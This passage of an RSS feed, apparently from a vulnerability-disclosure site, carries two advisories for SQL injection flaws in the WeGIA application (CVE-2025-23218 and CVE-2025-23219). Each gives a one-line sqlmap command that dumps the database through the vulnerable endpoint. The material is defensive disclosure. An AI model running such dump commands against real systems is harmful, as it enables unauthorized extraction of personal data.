    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 21 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23218</title>
        <link>https://www.cvehunters.com/p/cve-2025-23218/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23218/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23218-sql-injection-endpoint-adicionar_especiephp-parameter-especie&amp;#34;&amp;gt;CVE-2025-23218: SQL Injection endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23218&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23218&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_especie.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23218-sql-injection-endpoint-adicionar_especiephp-parameter-especie&amp;#34;&amp;gt;CVE-2025-23218: SQL Injection endpoint &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23218&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23218&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;adicionar_especie.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_especie.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;especie&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload-sqlmap&amp;#34;&amp;gt;Payload (sqlmap):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -u &amp;amp;#34;http://localhost/dao/pet/adicionar_especie.php&amp;amp;#34; --data=&amp;amp;#34;especie=especie&amp;amp;#34; --dbms=mysql --cookie=&amp;amp;#34;PHPSESSID=thaicee00su2lhvlceu9r9v66v&amp;amp;#34; --dump
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23218/403844925-6e106f6c-698d-4276-b7dd-3df222176ed6.png&amp;#34;
	width=&amp;#34;1344&amp;#34;
	height=&amp;#34;249&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23218/403844925-6e106f6c-698d-4276-b7dd-3df222176ed6_hu_de0174550aa0f97a.png 480w, /p/cve-2025-23218/403844925-6e106f6c-698d-4276-b7dd-3df222176ed6_hu_d6ee4a7d605c9ed5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;539&amp;#34;
		data-flex-basis=&amp;#34;1295px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It was possible to identify the database &amp;lt;code&amp;gt;wegia&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23218/403844621-a496e1e3-488f-4d2d-a9d3-be3adfaacde3.png&amp;#34;
	width=&amp;#34;1343&amp;#34;
	height=&amp;#34;218&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23218/403844621-a496e1e3-488f-4d2d-a9d3-be3adfaacde3_hu_d34b18344e26745c.png 480w, /p/cve-2025-23218/403844621-a496e1e3-488f-4d2d-a9d3-be3adfaacde3_hu_5b51c5d48c95e4da.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;616&amp;#34;
		data-flex-basis=&amp;#34;1478px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It was possible to fully dump the &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt; table.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23218/403869737-a1092b56-7ae3-40aa-966e-902b6da920e7.png&amp;#34;
	width=&amp;#34;1347&amp;#34;
	height=&amp;#34;126&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23218/403869737-a1092b56-7ae3-40aa-966e-902b6da920e7_hu_44347e579bef36ca.png 480w, /p/cve-2025-23218/403869737-a1092b56-7ae3-40aa-966e-902b6da920e7_hu_6833eead79fc2641.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;1069&amp;#34;
		data-flex-basis=&amp;#34;2565px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage: Exposing customer data or business information can significantly harm the organization&amp;#39;s image.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xhv4-88gx-hvgh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xhv4-88gx-hvgh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 20 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23219</title>
        <link>https://www.cvehunters.com/p/cve-2025-23219/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23219/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23219-sql-injection-endpoint-adicionar_corphp-parameter-cor&amp;#34;&amp;gt;CVE-2025-23219: SQL Injection endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23219&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23219&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_cor.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23219-sql-injection-endpoint-adicionar_corphp-parameter-cor&amp;#34;&amp;gt;CVE-2025-23219: SQL Injection endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23219&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23219&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_cor.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload-sqlmap&amp;#34;&amp;gt;Payload (sqlmap):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -u &amp;amp;#34;http://localhost/dao/pet/adicionar_cor.php&amp;amp;#34; --data=&amp;amp;#34;cor=cor&amp;amp;#34; --dbms=mysql --cookie=&amp;amp;#34;PHPSESSID=thaicee00su2lhvlceu9r9v66v&amp;amp;#34; --dump
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23219/403877746-114d9e46-ec6d-4477-bc87-b2bfe516a53d.png&amp;#34;
	width=&amp;#34;1342&amp;#34;
	height=&amp;#34;180&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23219/403877746-114d9e46-ec6d-4477-bc87-b2bfe516a53d_hu_1d87c0dd14172da3.png 480w, /p/cve-2025-23219/403877746-114d9e46-ec6d-4477-bc87-b2bfe516a53d_hu_b29a8dbb14be12a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;745&amp;#34;
		data-flex-basis=&amp;#34;1789px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It was possible to identify the database &amp;lt;code&amp;gt;wegia&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23219/403877561-4055ecb6-99d2-4a77-b921-943b672ea673.png&amp;#34;
	width=&amp;#34;1343&amp;#34;
	height=&amp;#34;218&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23219/403877561-4055ecb6-99d2-4a77-b921-943b672ea673_hu_d34b18344e26745c.png 480w, /p/cve-2025-23219/403877561-4055ecb6-99d2-4a77-b921-943b672ea673_hu_5b51c5d48c95e4da.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;616&amp;#34;
		data-flex-basis=&amp;#34;1478px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It was possible to fully dump the &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt; table.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23219/403877916-a91ad1ea-7d42-4665-a275-c018dc1de239.png&amp;#34;
	width=&amp;#34;1347&amp;#34;
	height=&amp;#34;126&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23219/403877916-a91ad1ea-7d42-4665-a275-c018dc1de239_hu_44347e579bef36ca.png 480w, /p/cve-2025-23219/403877916-a91ad1ea-7d42-4665-a275-c018dc1de239_hu_6833eead79fc2641.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;1069&amp;#34;
		data-flex-basis=&amp;#34;2565px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage: Exposing customer data or business information can significantly harm the organization&amp;#39;s image.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h2mg-4c7q-w69v&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h2mg-4c7q-w69v&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
